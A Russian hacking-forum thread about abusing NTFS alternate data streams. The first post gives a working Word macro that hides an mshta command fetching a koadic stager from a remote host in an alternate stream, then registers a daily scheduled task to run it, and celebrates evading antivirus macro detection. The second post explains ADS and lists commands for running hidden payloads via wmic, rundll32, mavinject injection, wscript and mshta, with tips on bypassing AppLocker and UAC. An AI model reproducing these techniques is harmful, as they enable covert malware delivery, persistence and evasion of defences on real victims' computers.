Что нового?
Взлом
Уважаемые гости! При посещении нашего сайта просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.п., а также при обращении за помощью просим быть внимательными: на сайте есть как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант-сервиса. Спасибо, что посетили XakerPlus!

Альтернативные потоки NTFS

J

Johny

Гость
Кто не знает что такое Альтернативный поток - иди читать статью дружок, ну а те кто уже в теме велком:
 ​
Не для кого не секрет что во многих антивирусных программах присутствует дополнительные средства анализа макросов офиса. Зачастую все действия макросов подвергаются дополнительной эвристической обработке и могут быть задетекчены различными методами.
 ​
В своем тесте мы будем использовать фреймворк koadic (zerosum0x0/koadic)
 ​
Готовим stager:
 ​
1536679570246.png
 ​
наш stager готов и мы приступаем к созданию нашего документа:
Открываем макросы word и пишем код следующего вида:Sub AutoOpen()
Dim exe As String

Shell ("powershell.exe -nop -w hidden Set-Content -Path C:\Users\User\Documents\Doc2.docx -Stream Aop.ps1 -Value 'mshta http://10.10.1.244:9999/ptYkb'")



End Sub

Sub AutoClose()
Dim exe As String

Shell ("powershell.exe -nop -w hidden $action=New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-nop -w hidden C:\Users\User\Documents\Doc2.docx:Aop.ps1'; $trigger=New-ScheduledTaskTrigger -Daily -At 6:20pm; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'LostFound' -Description 'Test' ")

End Sub

image.png


Я не буду приводить пример с использованием %Path а так же с проверкой текущей даты и выставление скедулера на конкретное время. (дорогой читатель сам догадается как это сделать)
 ​
Расскажу только что мы делаем:
 ​
В первой части нашего макроса мы на стадии открытия документа создаем альтернативный стрим под названием Aop.ps1 причем открываем его в самом документе (хотя это и не главное - можно куда угодно запихать) и кладем туда стринговое значение на load нашего stager.
 ​
1536680594747.png
 ​
Ну а во второй части на стадии закрытия данного документа, мы создаем в планировщике задач, таску которая вызовет load нашего stager из альтернативного стрима в определенное время, в данном случае 6-20pm localtime.
 
Для хорошего эффекта нам конечно же стоит использовать TLS ну и обфускацию ни кто не отменял (статьи по этой теме были по моему даже на форуме).
 
Наша таска создалась:
 
image.png

 
Ну а теперь наливаем кофе и ждем....
 
Бинго:
 
image.png

 
Проверяем статус командой zombie:
 
1536680398462.png

 
Ну и конечно для нашего спокойствия проверим АВ:
 
image.png

 
Как же прекрасно что я защищен!
 
Что и зачем мы сделали - мы авойднули детект на стадии доп эвристики в макро защитах АВ программ. Как я и писал раньше использование альтернативных стримов - это просто дополнительный уровень триксов для сокрытия.
 ​
Автор статьи не несет ответственности за применение описываемых техник в незаконных целях. Материал статьи предоставлен в образовательных целях и для использования в рамках white hat практик.
 ​
 ​
© copyright
 ​
 
Последнее редактирование:
 
Для понимания статьи, нам необходимо будет описать не много теории.
 
 
1. Введение
 
Цель этой статьи – описание альтернативных потоков данных в Microsoft Windows, демонстрация того, как их можно создать, скомпрометировав машину и благодаря этому обойти некоторые политики безопасности системы, так же в дальнейшем мы рассмотрим методы детектирования ADS и защиты для Blue Team.
(Не факт что все будет описано в этой статье, но будет цикл минимум из 3 статей)
 
2. Что такое альтернативные потоки данных (ADS - я буду использовать это обозначение в статье)
Альтернативные потоки данных появились в ОС Windows NT с введением файловой системы NTFS.
Что же такое альтернативные потоки данных?
 
Альтернативные потоки данных ( Alternate Data Streams, ADS) — метаданные, связанные с объектом файловой системы NTFS.В файловой системе NTFS файл, кроме основных данных, может также быть связан с одним или несколькими дополнительными потоками данных. При этом дополнительный поток может быть произвольного размера, в том числе может превышать размер основного файла.
 
В сущности, они были созданы для обеспечения совместимости в HFS (устаревшей файловой системой Macintosh). Суть организации HFS состоит в раздвоение файла на файл данных и файл ресурсов. В файле данных находится содержимое документа, а в файле ресурсов - идентификатор типа файла и другие свойства.
 
На сегодняшний день не всем известно о существовании альтернативных потоков данных. Однако какое-то время они использовались некоторыми не лучшими представителями сообщества специалистов безопасности. Было отмечено увеличение использования этих потоков злонамеренными хакерами, желающими спрятать свои файлы сразу после компрометации компьютера.
 
Кроме этого, было замечено, что некоторые вирусы и другие типы злонамеренного ПО также используют альтернативные потоки данных, до сих пор можно очень часто встречать использование ADS в различных нашумевших атаках. Проблема в том, что эти потоки нельзя просмотреть, используя стандартные методы, через командную строку (речь идет о простом листинге dir) или с помощью Windows Explorer.
 
Как же обнаружить злонамеренное использование альтернативных потоков данных? Необходимо следить за повышением использования таких потоков. Даже если учесть, что корпоративный объект хорошо защищен, нужно иметь в виду, что не все антивирусные средства в конфигурации по умолчанию проверяют альтернативные потоки данных.
 
В настоящее время часть антивирусных продуктов находит эти потоки, но только после дополнительной настройки, которая сильно повышает нагрузку на дисковую подсистему (на файловых серверах при копировании может быть Швах) и в результате чаще всего эти настройки выключены администраторами.Конкретные методики обнаружения альтернативных потоков данных я рассмотрю в отдельной статье.
 
1526893796994.png
 ​
3. Пример использования альтернативных потоков данных
Добавим в альтернативный стрим файла Test.exe нашу Лазанью.
 
1.png

 
Проверяем и запускаем
 
1.png


Проверим что нам выдаст команда dir
 ​
1.png
 ​
Стрим не отображается.
Посмотрим стримы:
 
1.png

 
3. Варианты запуска
 ​
Теперь посмотри варианты запуска и вложения в ADS
 ​
Рассмотрим простой вариант;"type c:\temp\bginfo.exe > "C:\program files (x86)\Teamviewer\TeamViewer12_Logfile.log:bginfo.exe"
Wmi

"wmic process call create '"C:\program files (x86)\Teamviewer\TeamViewer12_Logfile.log:bginfo.exe"'
Rundll32

rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
Mavinject

c:\windows\SysWOW64\notepad.exe
tasklist | findstr notepad
type C:\temp\AtomicTest.dll > ""C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
C:\windows\WinSxS\wow64_microsoft-Windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
Wscript
Код: 
type "C:\Program Files\test\wscripthello.vbs" > "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:wscripts.vbs"

wscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:wscripts.vbs"
Cscript

Код: 
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:wscripts.vbs"
MSHTA
Код: 
type C:\temp\helloworld.hta > wscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"

mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
4. Применение ADS в первую очередь используется для сокрытия вредоносов или нагрузок.
 
Важные замечания:
 
1) Антивирусы отлавливают "загруженный" ADS на доступе к процессу либо на полном сканировании. Фаст сканы при работе с файловой системой не анализируют ADS.
2) Средствами ADS отлично обходятся политики applocker
3) ADS иногда применяют для UACBypass
4) ADS это всего лишь hidden метод, а не панацея. Обфусцируем и криптуем свои нагрузки.
5) Как я не давно выяснил, не так много админов имеют представление об ADS, поэтому ветка в реестре либо команда в планировщике вызывает у них диссонанс когда они не обнаруживают файл "mscop:los.exe" в указанной папке, используя простой explorer.
 
Ну и напоследок чуток вкусного, при должной и не большой доработке очень любопытный результат.
smile.png

(ну а старики оценят и вспомнят старую, добрую тулзу тыц)
 
Вот что указывает автор:
 
Этот скрипт будет сохраняться на компьютере под управлением Windows под стандартными и административными учетными записями,используя два альтернативных потока данных. Первый поток альтернативных данных хранит полезную нагрузку,а второй альтернативный поток данных хранит VBScript, который действует как оболочка, чтобы скрыть приглашение DOS при вызове потока данных, содержащего полезная нагрузка. При передаче аргументов вы должны включить функцию и параметры, необходимые для вашей полезной нагрузки.Аргументы также должны быть указаны в кавычках.
 
 
© copyright
 
 
 
Последнее редактирование:
Войдите или зарегистрируйтесь для ответа.


Сверху